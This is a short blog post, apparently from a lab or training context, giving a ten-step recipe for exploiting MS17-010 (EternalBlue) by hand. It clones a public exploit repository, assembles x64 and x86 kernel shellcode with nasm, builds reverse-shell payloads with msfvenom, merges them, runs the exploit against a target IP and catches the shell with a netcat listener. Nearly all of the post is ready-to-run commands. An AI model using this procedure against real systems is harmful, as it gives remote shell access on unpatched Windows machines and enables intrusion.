Manually Exploiting MS17-010 (python2 to python3)
Chris
Posted on May 5, 2021
This is a quick write-up on how to exploit MS17-10 after enumerating your victim machine.
I was trying to run Auto-Blue but with the switch from python2 to python3 I was hitting some hurdles. I read somewhere that you can run pyenv as a workaround but I needed this to work in a crunch. This was pulled from the root4loot blogpost and all thanks really goes to them on this one, check it out! Link
Step 1. Grab the code from https://github.com/worawit/MS17-010
Command:
git clone https://github.com/worawit/MS17-010
Step 2. Display the contents of the folder
Command:
ls -l MS17-010/shellcode/
Step 3. The next step in their walk-through is to assemble both the x64 and x86 shellcode then merge them below. You can get away with only doing 1 but if you dont know the arch then it could not work.
Assemble kernel shellcode with nasm.
Command:
nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin
Step 4. Now generate a binary payload with your LHOST and name it sc_x64_payload.bin.
Command:
msfvenom -p windows/x64/shell_reverse_tcp LPORT=443 LHOST=tun0 --platform windows -a x64 --format raw -o sc_x64_payload.bin
Step 5. Concentrate payload & shellcode
Command:
cat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bin
Step 6. Now assemble the kernel shellcode with nasm.
Command:
nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin
Step 7. Then generate a binary payload and label this one sc_x86_payload.bin
Command:
msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=tun0 --platform windows -a x86 --format raw -o sc_x86_payload.bin
Step 8. Concentrate payload and shellcode.
Command:
cat sc_x86_kernel.bin sc_x86_payload.bin > sc_x86.bin
Step 9. Now its time to merge them if that's what you would like to do. This will put them in the same binary and included in the eternalblue_sc_merge.py script.
Command:
python MS17-010/shellcode/eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin
Step 10. Now run the exploit. Just as a warning I had to run this multiple times to catch a shell and reverted my box as well.
Command:
python MS17-010/eternalblue_exploit7.py targetIP sc_all.bin
Command:
nc -nvlp 443
Posted on May 5, 2021
Join Our Newsletter. No Spam, Only the good stuff.
Sign up to receive the latest update from our blog.